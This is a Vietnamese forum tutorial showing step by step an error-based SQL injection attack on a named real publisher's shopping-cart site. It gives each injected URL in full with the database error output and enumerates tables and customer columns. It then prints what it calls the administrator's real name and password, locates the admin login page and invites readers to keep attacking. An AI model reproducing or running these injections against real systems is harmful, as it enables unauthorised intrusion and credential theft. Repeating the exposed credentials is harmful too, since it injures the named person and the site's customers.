TUT Hack web lỗi sql chi tiết

Ngồi learn get root oải quá lang thang tự nhiên lòi ra thằng này . Nhìn nó nghi nghi thế là check SQL thử - Hi.c cái này bình thường ko có gì bà con đừng có chửi nha
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074'
thêm đại dấu ' vô . he biết ngay mà nhìn đã thấy nghi rồi
Code:
   
Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/SCart/cart.asp, line 76
Hí làm gì giờ nhỉ thử lấy column xem nào ^.^
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.columns%20where%20table_name%20not%20in%20(%20'')))--sp_password
được gì thế này
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Address' to a column of data type int.

/SCart/cart.asp, line 76
thế là lòi ra rồi he he . tiếp tục query ta được một đống sau
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.columns%20where%20table_name%20not%20in%20(%20'Address','AlsoPurchased','Authors','BEGInventory','BEGPayables','BEGReceivables','BEGReceivables','Books','Categories','Contacts','Customers','DiscountRate','NewsTopics','NewsSources','Orders','PayablesTrack','PaymentType','ReceivablesTrack','SachDBchuaTG','SachDBcoTG','Sales','Search','Session','Settings','Stores','sysconstraints','syssegments','TaxRate','Test','dtproperties','Employees','Inventory','InventoryDetails','InventoryTrack','ItemAuthor','ItemAuthorKeyword','ItemCategory','Items','ItemSubjectKeyword','ItemSubjectKeyword','ItemTitleKeyword','ItemType','ItemWineryKeyword','Keywords','News','TheLoaiSach','TransactionDetails','vwAccounts','Wineries','Wines')))--sp_password
Nhìn cái vwAccounts thấy nghi nghi nhưng hok có pass admin T.T Hóa ra nó nằm ở Customers
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='customers'%20AND%20column_name%20not%20in%20('PKId','Alias','Password','CustomerName','AddressId','Email','LastSale','TotalSaleYTD','Balance','Category','CreditRating','CreditLimit')))--sp_password
Cứ từ từ mà soi là ta lại được những table kia ^.^ Customname kìa hihi Password kìa ^.^
thế mà làm mình soi cái này mới ức chứ
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='Orders'%20AND%20column_name%20not%20in%20('PKId','CustomerId','EmployeeId','OtherStoreId','StoreId','SupplierId','OrderType','OrderStatus','OrderDate','PickupDate','ShippingHandling','ShipToName',%20'ShipToAddressId')))--sp_password
hè hè bây giờ ta lấy password thôi
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%2%convert(int,(select  top 1 CustomerName%2b'/'%2bPassword from Customers))--sp_password
Hè hè ra Đào Ngọc Đạt/NgocDat là name và pass của admin >Sướng nhá . Nhưng mà vẫn chưa thấy link login đâu cả . Lười check thôi thì đoán vậy
login không phải , thử nguoiquantri không phải . Khôpng biết Admin có để link login vô ko nhỉ . Đang chán thế nào tay lại đánh thêm vào url dòng admin thế là nó lòi ngay ra . Hic kể ra cũng có lúc ngu thật
Code:
http://www.nxbctqg.org.vn/admin
Ô nhưng sao thế này nó đòi ID để login T.T Thử đại cái usename Đào Ngọc Đạt không được hehe lại phải đi soi típ rùi . Nhưng mà đói rùi anh em vô check nha thế mới vui ^.^ Đi ăn cơm cái đã . Chú ý mấy cái table có ID đằng sau anh em nha .
The end : Đã báo admin . Không phá hoại gì . Lạy chúa tha tội con thờ Phật cơ T.T